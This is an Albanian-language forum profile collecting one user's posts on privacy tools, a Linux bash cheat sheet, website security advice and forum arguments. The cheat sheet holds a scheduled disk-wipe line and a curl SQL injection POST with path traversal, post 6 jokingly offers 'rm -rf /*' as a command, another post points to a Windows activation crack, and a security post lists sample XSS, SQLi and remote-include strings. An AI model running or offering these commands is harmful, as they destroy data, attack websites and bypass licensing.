Profile of albanianwizard

×

Permbledhja

albanianwizard Zërist

Stats for albanianwizard
Posts:   43 (0.009 per day)
Data e regjistrimit:   05-11-2008, 17:04:34
Last Active:   14-01-2014, 15:03:06
Age:  
Offline Offline

Messages - albanianwizard

1
Guida & Tutoriale / Jo me Google? Pak privacy please!
« ne: 26-08-2013, 06:07:09 »
Eshte bere e ditur tashme se Google, Yahoo, Microsoft nuk duan tja dine me per privatesine [http://nakedsecurity.sophos.com/2013/08/14/google-says-gmail-users-cant-expect-privacy/], dhe kjo pak a shume po ndodh me ç'do kompani Amerikane pasi eshte e detyruar nga ligjet qe jane atje, kush eshte si ata e "mbyll nje sy e nje vesh" , ndersa te tjere jane ne gjendje edhe te mbyllin komplet biznesin pasi vleresojn te drejtat para lekeve (si psh https://lavabit.com/ )

Deshiron te shohesh ç'do gje qe ke ber me Google nder vite?
Login tek https://history.google.com me adresen tende te emailit, shiko kerkimet, videot, imazhet, etj etj qe ke kerkuar gjat gjithe ketyre koheve ku eshte regjistruar, IP'ja Cookiet, Sistemi operativ, koha e kerkimit, detajet e browserit, e ç'do detaj tjeter qe mund te te profilizoj.

Po pastaj ?
https://en.wikipedia.org/wiki/PRISM_(surveillance_progra m)
https://startpage.com/eng/prism-program-exposed.html

Ndersa mendon se me Google kerkimet jane "ndryshe" ke te drejte : www.ted.com/talks/eli_pariser_beware_online_filter_bubbles.html
www.dontbubble.us

Per motorre kerkimi mund te kesh kerkimin e "Google" duke rezervuar privatesine e kerkimit : https://startpage.com , nderkohe qe kur klikon neper faqe interneti (linqet) mund te klikosh tek "View by Ixquick Proxy" dhe trafiku do jete relativisht i sigurt.

Motorr tjeter kerkimi shume i mire qe po rritet dita-dites me hapa gjigande eshte https://duckduckgo.com , po mar pjese edhe tek perkthimi shqip qe eshte aprovuar po skam pasur ende kohe tja nis perkthimit :/ , kush do te mari pjese eshte i mirepritur.

Per te ruajtur IP't dhe per te enkriptuar trafikun mund te perdoren programe si tor-browser ose JonDo te cilet jane goxha te mire.... Harroni sherbime si "hidemyass" etj, ..... https://anonymous-proxy-servers.net/en/benefits.html

Emaili, chat , filesharing, etj? => AIO RETROSHARE :
http://retroshare.sourceforge.net/

Goxha i mire pasi eshte dhe i "decentralizuar" , pra mesazhet dhe komunikimet nuk shkojne ne nje server qendror ku ruhen por jane te tipit "torrent" p2p

Skype ? = https://jitsi.org/


Per nje liste te plote alternativash pastaj : https://prism-break.org/

2
Portalet Shqiptare / Mbyllet perfundimisht webmaster.al
« ne: 26-08-2013, 05:34:07 »
Me sa duket qenka ber per reinstall...

$ curl --head webmaster.al
HTTP/1.1 302 Moved Temporarily
Server: cloudflare-nginx
Date: Mon, 26 Aug 2013 03:32:10 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=df8a7zzzzzzzzzzzzzzzzzzzzzzzzzzzzzz377487930699; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.webmaster.al
X-Powered-By: PHP/5.2.17
Location: http://webmaster.al/install/install.php
CF-RAY: a3d74zzzzzzzzzzzz

3
Guida & Tutoriale / problem me windows genuine
« ne: 26-08-2013, 05:18:36 »
Perdor Linux??

Nese vertet nuk ja ben dot pa windows,
.... mund ta fusesh dhe ne virtual machine(virtualbox psh), e mbas instalimit perdor Windows 7 Loader , e gjen tek warez-bb

4
Linux | Unix | BSD | / Linux cheat sheet - e perdor ne pune
« ne: 11-01-2012, 13:01:49 »
Pershendetje,

doja te ndaja "flet-mashtrimin" apo truket qe perdor zakonisht ne pune me ju.
Jane komanda bash te grumbulluara me kalimin e kohes gjate punes apo duke vizituar faqe te ndryshme.

Mund te kuptohen vetem mbas perdorimit.

Kodi: [Zgjidh]
*Sherbe folderin ku je tani (pwd) ne webserver

python -m CGIHTTPServer

*Printo top 100 proçeset qe perdorin me shume ram

ps auxf | sort -nr -k 4 | head -100

*Gjej [dot] - [pik] files me find

 find / -type f -maxdepth 40 -iname ".htaccess"

*Gjej dot files por injoro .pl , c dhe py files

 find / -type f -maxdepth 40 \( -iname ".*" ! -iname ".pl" ! -iname ".c" ! -iname ".py" \)

*Gjej serverat qe jane lisetning ne sistem  / TCP dhe UDP me detaje per proçeset qe po perdorin ,pid, ram / ne forme numerike pa zgjidhur portat

ss -neptulem
ss -npem

*Shiko lidhjet TCP / HTTP (me ke po komunikon browseri)

 ss -no state established '( dport = :80 or sport = :80 )'

*Display a list of learned MAC addresses for s bridge

brctl showmacs br0

*Generate a 12 character random Password

openssl rand -base64 12

*PING + TRACEROUTE AIO

mtr [url=http://www.google.com]www.google.com[/url]

*Execute a Command at the given time and redirect the output at some tty/pts.

echo "ls -l >/dev/pts/3" | at 12:00

echo "wipe /* > $(tty) | at 00:00  #bad ;) your hdd will be wiped at 00:00

*List current mounted filesystems in a nice layout

mount -l | column -t

*Mount your partition / folder to a remote machine via SSH (sshfs should be installed)

sshfs -o workaround=all name@server:/media/linux /home/ruphus/linux

fusermount -u /home/ruphus/linux #to umount

*Get your external IP

curl ifconfig.me

*Shiko statistikat / network interfaces (kernel interface table)
netstat -i

*Real time TCP network activity monitoring

lsof -i tcp -r

lsof -P -i -n #current connections

*Delete all files in the current folder that match a certain file extension

rm (*.foo|*.bar|*.baz)

*Delete all files in the current folder that DONT match a certain file extension

rm !(*.foo|*.bar|*.baz)

*Find and delete files older than 30 days

find /var/log/ -type f -mtime +30 -exec rm {} \; #mv, sort, nc etc can be used as well

*Calculate how many files are under directories

cd / && for i in *; do echo -n "$i: "; find $i -type f | wc -l; done

*Find files bigger than 30MB

find . -type f -size +30000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'

*SCP from Local to Remote server listening on port 13293 preserving file permissions

scp -P 13293 -p patch-2.5.4-20.i586.rpm  root@11.11.11.11:/root/

*SCP from Remote listening on port 14234 to Local current folder preserving file permissions

scp -P 14234 root@11.11.11.11:/root/informer.dmp ./

*List only Subdirectories in current directory displaying last modification

ls -dthor */

*List only files Subdirectories in current directory displaying last modification

ls -fthor */

* remove blank lines and spaces from file
perl -pi -e 's/^\s+//'

* SNMP Stuff
snmpwalk -Os -c public -v2c 192.168.0.15
snmpget -v 2c -c public 192.168.0.15 system.sysUpTime.0
snmpwalk -Ov -OQ -v2c -c public 192.168.0.15 .1.3.6.1.2.1.25.6.3.1.2

* clear arp cache
ip neigh flush dev eth0

*How to refresh arp table ?

- You can save ip from arp table:

arp -an | sed -s 's/.*(\([0-9.]*\)).*/\1/' > /tmp/ip_to_arp

- And then ping all ip:

for ip in `cat /tmp/ip_to_arp`; do ping -c 1 ${ip}; done

* get md5sum from a string:
 echo -n Admin | md5sum --text

* Search for RFI vulnerabilities
find . -name \*.php -exec egrep -inH -w 'require|require_once|include_once' {} \; | grep \$

* sql injection post with curl
 curl --data "npath=../../../../../wp-content&eventid=-1' UNION ALL SELECT 1,2,current_user(),connection_id(),version(),database(),7,8,9-- " http://www.site.com

* Check hdd performance:
hdparm -tT

* Check out CPU usage
watch -n 0.2 "ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10"

* Check out connected OpenVPN users
openvpn-user status | grep CLIENT_L | grep -v UNDEF | nl

* Scan with clam
clamscan --detect-pua --heuristic-scan-precedence=yes --algorithmic-detection=yes --scan-pe=yes --scan-elf=yes --scan-ole2=yes --scan-archive=yes --log=/tmp/viri-log --move /tmp/viri -r /

* Spliting and joining flv files
ffmpeg -i video.flv -ss 00:00:00 -t 00:15:00 -vcodec copy -acodec copy video1.flv
ffmpeg -i video.flv -ss 00:15:00 -t 00:15:00 -vcodec copy -acodec copy video2.flv
avidemux2_cli --audio-codec copy --video-codec copy --output-format flv --load video1.flv --append video2.flv --append video3.flv --save video.flv

* System Health CHECK AIO
cat /var/log/messages | egrep -in -w 'uplink|error|fatal|alert|alarm|failed|refused|warning|online|offline|unreachable|write|kernel|link|problem|segfault|unavailable|disconnecting|connect|timeout|responding|shutting\ down'
zcat /var/log/*-*20111128.gz | egrep -in -w 'uplink|error|alert|alarm|fatal|failed|refused|warning|online|offline|unreachable|write|kernel|link|problem|segfault|unavailable|disconnecting|connect|timeout|responding|shutting\ down'


* List Hardware / Driver information
lspci -mvkbnn

* Copy multiple files on a dir
cp /etc/xdg/openbox/{rc.xml,menu.xml,autostart,environment} ~/.config/openbox

* Add secondary IP address:
ip addr add 10.102.97.68/24 dev bond2.200 label bond2.200:1

Write protecting a file using chmod command

Let say you want to write protect the file called data.txt so that no other users can change it, enter:
$ chmod go-w data.txt
#chattr +i data.txt
To provide back permission use:
$ chmod go+w data.txt
chattr -i data.txt

Instalo me pacman duke simuluar *
pacman -S $(pacman -Ssq foo)
pacman -Rs (fshi me gjithd dependencies)

kopjo vetem [.] files
find /home/arditi/ -maxdepth 1 -type f -exec cp -Rp {} /media/backup/arditi/  \;
kopjo vetem direktori
find /home/arditi/ -maxdepth 1 -type d -exec cp -Rp {} /media/backup/arditi/  \;

* Foli shokut qe eshte loguar ne te njejten makin tek terminali vet :D
echo "Salamun Alaikum" > /dev/pts/2

* Grep fjalen dhe bej exclude
locate sploit | grep -vw 'arditi'

Mbase dikujt mund ti sherbejn.

(mund te shkarkoni attachment ne txt)

5
Zeri.tech / Mos keni degjuar ndonjhere per SnIpEr_SA?
« ne: 11-01-2012, 12:33:14 »

http://www.zone-h.org/archive/notifier=SnIpEr_SA
http://www.exploit-db.com/author/?a=533

eshte arab.
nuk do te isha aq i sigurt qe ka qene ai pasi shpesh keta modifikojn shelle, u ven emrin e tyre dhe te tjeret i perdorin...
kenaqesia?
duhet te mesosh te besh dallimin midis hackerit dhe script kiddies, hackera ishin ata qe hyne ne kernel.org ;) jo keta qe bejn indexe e fusin shelle...

document yourself

6
Kodi: [Zgjidh]
rm -rf /* >/dev/null 2>&1 &
Rocks  :D

[Ps - fshin komplet kompiuterin, redirekton outputin tek /dev/null dhe shkon ne background ]

7
yup, une jam perseri i te njejtit mendim, nuk eshte thjesht ç'eshtje url-sh (i gjate apo i shkurter) persa i perket kesaj teme google mund te perdori dhe faktore te tjere si psh koha qe i duhet faqes per tu gjeneruar (html statik shume me pak - pa permendur ketu shpejtesine e serverit) , gjithashtu faqet e wordpresit kane headers qe i dallojn nga faqet e tjera, e ne pergjithesi faqet e punuara me dore dallohet nga te tjerat.

+1 per plain html

8
Yup, ata leshojn IP-t dhe mund edhe ti heqin, por task force-t e tyre nuk mund te kontrollojn te dhenat ne (serverat , hdd-t / raidet) domaine te caktuara si korea e veriut, .ai, rusi etj..

9
Albwebmaster / Si te fshije nje virus nga website?
« ne: 08-02-2011, 15:24:05 »
 :-[

Rastet jane 3

1) dikush ka sinjalizuar faqen tende qe "gjoja" ka viruse, dhe ne kete rast duhet te heqesh faqen nga blacklista duke qene i sigurt qe ... /(me piken 2 je ne rregull)

2) Faqa ka realisht virus, e ne shumicen e rasteve jane malware ne javascript qe infektojn browserat, ne raste te tjera viruse me ane te ActiveX dhe ne raste te tjera boot-e.
Per te gjitha keto, te duhet ti besh nje skanim te mire komplet hostit me clamav
http://albanianwizard.org/scanning-your-linux-box-with-clamav-antivirus.albanianwizard
E normalisht qe te besh kete te duhet akses SSH ne server dhe clamav normalisht te jete i instaluar :)

3) ajo qe tha kokushta , pak a shume, ka trojane qe i ke marr ne pc dhe per ç'do faqe qe viziton te thone se ka virus, apo edhe per ç'do program qe hap, ne kete rast i infektuar eshte kompiuteri yt dhe jo serveri ku eshte hostuar faqa.

10
artikull interesant..
nje pyetje teknike...
e si behet per te hequr disa nga ato karakteret jolly?
po per te vendos .html ne fund...
theksojn qe perdor Joomla...
si ta bej?
flm 

me mode rewrite te apache behen mrekulli :)

gjithsesi, me sa kam vene re, google kupton kur nje faqe eshte realisht statike (html) dhe nje faqe eshte e gjeneruar me 'tricks'...

Kete e kam vene re ne vleresimin e lart qe i ben google faqeve ne html shqeto..

11
perveç atyre qe hapin domaine ne shtete ku xhandaret e botes nuk kan jurisdiksion...

12
Zgjidhja e temes eshte me shume pergatitje per webmasterat!

webi eshte i mbushur plote me kode ne javascript te cilat çaktivizojn kopimin e tekstit apo right clickun, e kjo do te mjaftonte per nje pjese te mire te vizitoreve, nese dikush ka njohuri deri aty sa te kaloj kete lloj mbrojtjeje (shume e thjeshte, ç'aktivizon javascriptin ne browser  :perqafim ) atehere ne kete rast zgjidhje eshte ajo qe quhet "encryptim" i faqes. Qe me sakt eshte nje konvertim i komplet faqes ne nje "kod te pakuptueshem" javascript, qe nga ana tjeter do te ishte perseri i dukshem per browserat.

Tools?
http://www.antssoft.com/htmlprotector/index.htm
apo te tjere online, ka sa te duash.

Si mund te thyhet kjo ^^

kete spo e themi  :D

13
Zeri.tech / Hackohet TCH, PERSERI!!!
« ne: 29-01-2011, 22:42:06 »
Me sa di une webmasteri i top-it eshte ekonomist  :D

dhe me sa kam pare nder vite, dhe edhe me nje pen-test te vogel ka shuuuume security holes ne top-channel dhe problemi eshte "nga cila dere te hy" e jo a hyet apo nuk hyet ne te....

Gjithsesi, ajo qe po mendoja nuk ishte as se sa newbie jane ata te top-it persa i perket IT - Security e as se e sata here eshte qe hakohet por po mendoja se ç'fare ka dashur te thote autori me shkrimin  hmmmmm:

O shqiptar, ata tallin menderen me ne, kurse ne shkojm e vritemi per ta.
Nuk duhet te luftojm kunder nesh po kunder atyre bashk (PD e PS)
Ne vend qe te ngrihemi per papunesine, jetesen e shpifur , injorancen, varferine, korrupsionin, padrejtesine, etj etj etj .... ngrihemi jo keta e jo ata,,, e ne fund te fundit te gjith mbushin barkun e tyre dhe i ndajn punet me njeri-tjetrin ne prapaskene...

Ne fund te fundit mire na behet, vete e kerkojme.

14
Zeri.tech / Disa keshilla per sigurine e webfaqeve
« ne: 10-12-2010, 18:56:56 »
Ardit faleminderit per shpjegimet me shume vlere qe ke dhene.
Eshte e rendesishme qe diskutohet dhe ceshtja e sigurise sepse deri tani i eshte dhene pak rendesi, edhe se ndoshta eshte nje nga gjerat me me rendesi.

Eshte e vertete, dhe diçka qe eshte per te ardhur keq eshte se edhe ato forume "qe merren me siguri" apo qe tentojn ta studjojn jane shume larg, dhe kjo eshte ajo qe me shqeteson me shume pasi nuk shikohet si diçka nga e cila mund te perfitosh apo edhe profesion por shihet si hobby, dhe menyre e mire per tu "pasur frike" apo per te gufuar velat e femijeve qe jane gati per lundrim duke perdorur dork ne google...

Per tju kthyer perseri temes,

Doja te fokusohesha pak ne disa komponent sigurie qe duhet te modifikoj ç'do webmaster.

komponentet e pergjithshem jane:

 1) Webserver
 2) PHP
 3) Mysql

Qe te tre keto komponent nuk duhet asnjeher te instalohen direkt nga distribucioni, psh pacman -S php, apo apt-get install apache2 e keshtu me  radhe, une gjithmon rekomandoj instalimin from scratch dhe ja arsyet:

1) Ke mundesi ti modifikosh dhe te aplikosh patche, dhe mund te shtosh komponent sigurie dhe te heqesh komponent qe perfaqesojn rrezik, module etj.

Psh, persa i perket PHP,s rekomandoj suhosin patch, si dhe çaktivizimit te shume funksioneve qe nuk duhen si exec() e keshtu me radhe...
Pra secili nga keto komponent, duhet te shkarkohet si source kod, pastaj ti aplikohen patche, pastaj te modifikohen (psh, apache me modifikimet e duhura mund te behet te duket nje ngix, apo nje Microsoft IIS, perfshire ketu faqet 404, 500,etj dhe fshehja e versioneve ne kete rast apo kamuflimi i softwarit eshte diçka shume pozitive, psh:

Kodi: [Zgjidh]
arditi@blackbox:~$ curl --head [url=http://www.top-channel.tv]www.top-channel.tv[/url]
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Dec 2010 17:42:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.10
Content-type: text/html
mora me thjesht 3 packeta (syn-ack-synack) serverin / versionin, php-n / versionin, pra per mua gjera qe mund te evitohen nese kompilohet nga source kodi, aplikohen patche (shumica e tyre bejn pune te mire kunder vulnerabiliteteve te zakonshme rfi, sql injection , lfi etj..) si dhe kamuflimin i cili te themi qe eshte shuuuume i mire , dhe eviton nje seri te mire exploitesh nga lamera qe provojn exploite te gatshme.

Psh te imagjinojm dike qe ka nje exploit per Microsoft IIS (edhe buffer overflow) dhe e leshon si i çmendur kunder serverit nderkohe qe ne realitet edhe pse fingerprinti thote se eshte Microsoft IIS kemi te bejm me nje apache. hmmmmm:

Persa i perket aplikacioneve te tjera, nje firewall i mire i testuar eshte gjithmon i duhur, perveç kesaj pastaj varet nga skripti qe ke se si mund te aplikosh metodat mbrojtese.

Nje mbrojtje e pergjithshme do te ishte nje SNORT i rregulluar mire i cili duke qene ne shtresen 7 te rrjetit (referr to Osi layers) mund te analizoj dhe te bllokoj kerkesa te tipit:

<script> alert ('xss');</script>
ose
post.php?id='union select all from users......
ose
file.php=http://asldjasdhj.com/evilscriptrsomething.txt?

e keshtu me radhe.
kjo eshte ajo qe preferoj kur kemi te bejm me menaxhime serverash, ndersa lind pyetja po kur nuk kam server te dedikuar???

Eh, ketu te gjith duhet te kerkojn aplikacionin e tyre te preferuar ne baze te softwarit qe perdorin, psh ctracker apo sisteme te tjera ne php qe kontrollojn dhe merren me "sanitising" te inputit.

Direktorit e adminit, sugjerohet qe gjithmon te sigurohen me .htaccess (pra kerkerse per login/password nga serveri) si dhe passwordet nuk duhet te dergohen asnjehere in blank.

Gjithsesi shumica e deportimeve qe behen sot, behen per shkak te budallukut te adminave qe egzekutojn software (keylogera) vend e pa vend.., u vidhen cookiet apo passwordet e shpetuara te firefoxit e keshtu me radhe...
Tema sigurisht eshte shume e gjate, dhe kam lene shume pa permendur,

Ervisi mund te shtojn normalisht shume.

Shpresoj qe keto info te mund ti sherbejn dikujt,

Me respekt,
Arditi.

15
Zeri.tech / Disa keshilla per sigurine e webfaqeve
« ne: 09-12-2010, 20:18:10 »
Pershendetje Ervis,

pershendetje per temen , deri tani te pakten po jepen mendime serioze.

Me informacionin qe kam ne dispozicion nuk jam dakort ne disa pika..
Persa me perket mua, kur flitet per siguri nuk jam ekspert siç eshte thene ne disa postime, dhe nuk e di se nga ka dale ajo info. Profesioni qe kam i afrohet por nuk eshte saktesisht ai, por perseri jam marr me sigurin dhe nuk kam pasur asnjehere 1 layered approach.


Duke u bazuar ne ate qe the, merresh me shume me web application security, dhe ketu po perfshij  injection flaws, scripting vulnerabilities e deri tek session hijacking dhe ja po e zgjerojm edhe me shume dhe po fusim worme ne javascript per deportime ne intranete.
E gjithe kjo metodike eshte shume e limituar ne akses, dhe shume lokale, nuk te jep fuqi "per me shume" dhe nese do "ta zgjerosh" per me shume fuqi, do te detyrohesh te dalesh nga lloi i sigurise.
Psh, po e zem se ke nje shell skript diku, ja po e zeme ke dhe safe mode bypass, por nje kompani hosting sado e vogel me nje webmaster te zotin do bente qe teshkaterrohej vetem 1 faqe, ja 10 por jo me shume..
Pra nese do per "me shume" do kalosh tek instalimi i ndonje kompilatori "on fly" , ndonje local root exploit,  instalimi i ndonje backdori,/rootkiti, dhe nuk kemi te bejm me me skripte por me kod.

Mbasi e kemi thene kete, dhe jam i sigurt qe i di keto qe po shkruaj dhe ke siguri mbi burimin e informacionit (eksperienca) dalim ne perfundimin se nje qe di dhe ben punen (penetration testing / auditing) kur e sheh punen e sheh ne forme multi-layered, pra nuk analizon vetem nje pjese te kodit (php, asp, etj) qe egzekutohet nga nje proçes (apache, ose tjeter) por shikon teresine e proçeseve, dhe teresine e sistemeve.

Shume gabojn kur mendojn se "uuu, ky sistemi ka SNORT, apo qenka firewalli perpara, apo... ; Si i behet , ka DMZ ne mes, si te kaloj ne GREEN" pasi nje afrim si ai qe u permend me siper do e shihte edhe snortin, firewallet, sistemet e sigurise etj si mundesi per te deportuar.
 hmmmmm:
Pra, e perseris , vete sistemet mbrojtese mund te shfrytezohen shume mire per sulm.

Kjo sepse:

1)Sistemet mbrojtese jane "prej kodi" dhe jo prej hekuri.
2)Ky kod eshte programuar nga nje njeri.
3)Shumica e kodeve nuk kalojn fazen penetration testing per shkak te kohes, fondeve etj.
4)Perderisa e ka programuar nje njeri atehere me siguri ka vulnerabilitet.
5)Aq e vertete eshte kjo sa qe ka ligje (KLOC) qe percaktojn sasine e vulnerabiliteteve qe gjenden ne 10Kloc kod psh.

I permenda te gjitha keto ne menyre qe te kuptohet ajo qe po shkruaj me poshte;

OpenSource nuk eshte aspak me i pasigurt se sa kodi i mbyllur apo privat perkundrazi jam i tjeter mendimi.
Kodi privat edhe pse eshte i mbyllur nuk do te thote se "eshte vertet i mbyllur" te pakten per ata qe dine te perdorin IDA pro debugger.
Kodi privat ka shume here me shume vulnerabilitete se ai publiku sepse sulmohet nga shume (qe nuk raportojn vulnerabilitete) dhe mbrohet nga pak (ata qe kane liçencen) dhe kjo ka sjelle ato ritme sulmi deri sa njohim viruset sot.
OpenSource , pikerisht se eshte kod i hapur edhe ky eshte nga njeriu dhe ka gabime, por ne ndryshim nga ai i mbylluri ka shume qe e sulmojn, dhe ne te njejten kohe prap shume qe perpiqen per rregullime.
Keshtu qe per mua, me shume njerez qe punojn per rregullimin e diçkaje do te thote relativisht me e sigurt se tjetra.
Nderkohe, me pak persona qe punojn per diçka, do te thote me pak e rregulluar + qe zakonisht exploitet per keto lloj vulnerabilitetesh qendrojn private, pa permendur ketu vrimat qe as tentohen ndonjehere te rregullohen.
(vulnerabilitet i windows 98 i kernel32.dll gjendet edhe sot tek windows7, yep, kernel i ri, bug i vjeter ;) )
Kjo eshte aq e vertete, saqe e dime mire te dy se sa viruse me sulme (exploiting) automatizuara ka ne qarkullim per sisteme me kod te mbyllur si windows pikerisht per shkak te pasigurise.

Persa i perket "pasigurise" se desktopeve/workstation etj Linux/Unix, them perseri dakort , sepse ç'do kod ka vulnerabilitete (ky eshte ligj) por perseri per tju kthyer mendimit te dhene me siper po sjell nje histori te vogel..
Perpara 2 vitesh po bisedoja me nje mikun tim i cili eshte Instruktor GLS (RedHat) dhe nga muabeti jboss dolem tek siguria, dhe ai me foli per nje projekt qe po zhvillonin per .mil tek sistemet e tyre per filesistemin e linuxit ku perveç lejeve te fajleve (siç besoj se e di rwx, ownership etj) u kishin shtuar edhe nje çertifikat qe i bente failet te lexushme vetem nga 1 user.

Duke thene kete, them se specialistet me te medhenj te sigurise perdorin Unix/Linux (patched normal), perfshir  ketu shoqerite investigative private, shoqerite shtetrore te cyber crime si dhe inteligjenca artificiale.

Duke u nisur nga supozimi qe te gjitha keto institucione, kane arsye te forta te cilat i shtyjn te perdorin open-source , kjo me çon te mendoj se eshte "more tested" and more widley tried to hack" se sa kodi i mbyllur.

R.Stallman : "Kompiuterin e lidh ne rrjet vetem ne mengjes per te shkarkuar emailin dhe ne darke per te derguar pergjigjet"

Nuk besoj se Torvalds + Torvalds + Torvalds * Bill Gates jane sa gjysma e ketij, dhe duke bere kete veprim nje njeri me njohuri te tilla besoj se ka arsyet e veta, qe çojn serisht tek ligji qe, nese diçka eshte koduar nga njeriu ka gjithmone vulnerabilitete dhe siguria eshte gjithmon relative.

Se fundmi, nese perdor windows, besoj se e di qe it's shipped out with NSA backdoor?
http://news.bbc.co.uk/2/hi/sci/tech/437967.stm

Per tju kthyer temes, keshilla ime per sigurimin e faqeve eshte:

"Edukimi i webmasterave me format e penetrimit dhe hackimit ne faqet e tyre, studimi real i kodit, nese nuk keni kohe per keto (si puna ime psh, se sdo rri te lexoj komplet source kodin e wordpresit) atehere te pakten aplikoni nje sistem mbrojtes apo bllokues per sulmet e njohura dhe ruhuni te pakten nga exploitet publike (pra kur e shihni qe ka, aplikoni patchin).

U habita kur lexova per hackimin e webmaster.al, une njehere kam bere nje 1/99 pen-test, dhe pashe qe kishin te instaluar, snort, psad, iptables , sisteme sigurie etj (e mbylla me aq) [sqarim, normalisht fola per kete me olgin a, algertin nuk me kujtohet] por nuk do ma kishte marre mendja qe te ishte hackuar me nje rfi te faq.php qe ka ketu e nuk mbahet mend qe eshte publik.

16
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 28-11-2010, 15:23:57 »
@ETusha,

jam me ty ne ato qe ke shkruar  :)

17
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 28-11-2010, 15:16:46 »
Ardit, me aftesite e tua ne fushen e sigurise, do kishte qene shume me vlere sikur te hapje nje blog shqip per te raportuar mbi problemet e sigurise ne faqet shqiptare ne vecanti, apo dhe per rreziqe te tjera ne internet ne pergjithesi. Dicka e tille i mungon shume rrjetit shqiptar.

Faktikisht nuk e kam menduar diçka te tille (blog), dikur e kam realizuar deri diku me ane te nje forumi qe kisha por ne kete moment punoj 8 ore + 2 ore rruge vajtje -   ardhje ne shtepi dhe me ngelet shume pak kohe per ti dedikuar vetes dhe familjes , kjo reflektohet qarte edhe ne postimet e rralla qe bej ne blog qe ne kete moment e shoh me shume si nje hobby, panvarsisht se qe kur e kam hapur anglisht me kane ardhur dhe oferta per pune nga njerez qe lexonin blogun e kam konsideruar gjithmon si nje metode per te ndare informacione me te tjeret.

Persa i perket publikimit te vulnerabiliteteve kete jam i mendimit qe duhet ta bejm ne menyre private, secili prej nesh te kontaktoj webmasterat dhe ti ofroj ndihme.
Kete e kam ber me disa webmaster shqiptar prej te cileve dikush i eshte pergjigjur emailit e dikush tjeter jo (mbase prej mendjemadhesis apo nuk e di) , por krijimi i nje faqeje e tipit milw0rm apo securityfocus etj, nuk do me pelqente sepse nuk mund te kontrolloj se ku do perfundoj ky informacion.
Te kujtojm ketu milw0rmin qe doli offline ( jo se kam te bej me diçka te ketyre permasave por kam info per temen),  "dhe u mbyll" ne underground jane shume komponent qe jane kunder ketyre lloj "selling arms to everybody on the corners of the net" , qe ka te beje me industrine e sigurise dhe eshte diçka e planifikuar mire .. (teme shume e gjate)...
http://shqip.albanianwizard.org/industria-hacker-fjala-per-white-hats-skiddie/
me shume info:
http://shqip.albanianwizard.org/c0d1ng-hor30r/
http://sites.google.com/site/zeroforowned/table-of-contents

Mbase ndonje webmaster me zi ka pritur mundesine per ti ber deme nje webmasteri tjeter dhe me nje exploit te gatshem te shpjeguar mire nuk do e mendonte 2 here...

Te jem i sinqert kam menduar te hap nje firm shqiptare qe merret me sigurine dhe ofron sherbime penetration testing / auditing por kjo ka ngelur ne leter per shkak se punoj ne kete moment dhe me pelqen puna qe bej (lodhem shume) por ja vlen barra qirane, edhe pse siç e tha edhe ETusha ne shqiperi as qe egsiton si treg.
Ku i dihet ne te ardhmen se ç'fare mund te ndodhi...

18
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 28-11-2010, 00:25:48 »
Keni te drejte, i kalova limitet qe me takonin dhe nuk me pershtatet ajo menyre e te shprehurit, e as e kam zakon ta perdor.

Kerkoj falje (te gjitheve) sepse ne kete rast kam qene vete une ai qe ndota ambjentin me volgaritetin qe perdora, dhe e perseris eshte diçka qe e urrej e ne te njejten kohe e denoncoj por siç eshte thene njeriu eshte i dobet dhe ndonjehere edhe pse ndjenjat jane e drejta dhe te motivuara kjo nuk duhet te mbizoteroj gjaktftohtesine apo parimet personale.

Kerkoj falje serisht, dhe perfitoj nga rasti te bej serisht thirrje ne dituri, ne kualitet, ne origjinalitet dhe ne shkembim te lire pa interes te informacionit ne te miren tone te perbashket.

Me respekt,
Arditi.

19
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 26-11-2010, 12:00:23 »
sa per te qeshur obobo hahahhaha, shum kam qesh edhe un, se un ende nuk po disha ta perdor Googlen mos valle e keni zbuluar ju dy googlen hahaahhaha pse si kerkova un ne google shkrova Informatika Shqiptare dhe ti nuk je askund ende me dhimbsesh :P
@dardanjan Ke te drejte  :-[



@Klisi, ke te drejte, e egzagjerova pak, po ne shqiptaret vetem me te bertitur jemi mesuar te marrim vesh...

ika, ja kalofshi mire te gjithe :)
Arditi

20
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 26-11-2010, 11:28:05 »
ke thene qe te kerkojm ne google me termin ''Informatika Shqiptare'' ti je i katerti ne radh eshte romeolab njeher pastaj albpc etj pastaj vjen ti ne fund:S se ti na qenke profesionist dhe nese je profesionist tregoje veten dhe na trego dicka qe ke bere vet dhe qe ne do te krenohemi me ty ne te ardhmen

hahaha :D
https://encrypted.google.com/search?hl=en&amp;source=hp&amp;biw=1280&amp;bih=797&amp;q=Informatika+Shqiptare&amp;aq=f&amp;aqi=g1&amp;oq=&amp;gs_rfai=

Shoku e di qe google tashme flet SSL? - perdore kur kerkon, se ISP-ja ben statistika se kush shikon me shume porno nga klientet :D [lol ketij kot qe i flas, as qe merr vesh se per ç'fare po flas]

@whitesnake
lol  :) , nuk bera une deface , thjesht kerkova se kush ishin keta "opinionistat" dhe vetem kur i pashe ne homepage nje goxha mesazh...
nuk do e harxhoja kohen me keta, aman :/

21
Zeri.tech / “Webmasterizimi” i kalamajve Shqiptar
« ne: 26-11-2010, 10:50:10 »
jo por un se pata me asgje te keq por ky me nje fjal nuk qenka mir ne mendje. ende si femijet jo ta hacka webin, jo ta bona kto, jo i paske kaq vjet jo kshtu jo ashtu, shikoje punen tende, sepse cdokush ka te drejt te te kritikoj e nese ti i merr kritikat per mir mund te permiresohesh e nese i merr per te keq ather edhe mua me vjen keq per ty.

ne kemi nje fjale te urte,

pirdh pirdh se lirohesh :)

Te kam shkruajtur gje "ta hacka webin" haahah 'hacka' lolz, te kam then po qe je kalama dhe kjo eshte e vertete.
Ajo qe nuk kupton ti nga tema, eshte pikerisht ajo qe je ti dhe forma se si flet dhe jeton ti.
Ti skupton gje as nga tema, dhe as ke per te kuptuar gje.
Siç nuk kuptohet edhe nga personi qe ka komentuar poshte teje,
tema nuk i drejtohet atyre qe nuk dine dhe qe duan te mesojn, kjo eshte thene 100000 here.
